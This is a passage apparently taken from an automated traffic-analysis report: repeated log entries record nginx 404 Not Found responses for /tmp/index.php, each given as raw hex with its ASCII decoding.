Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
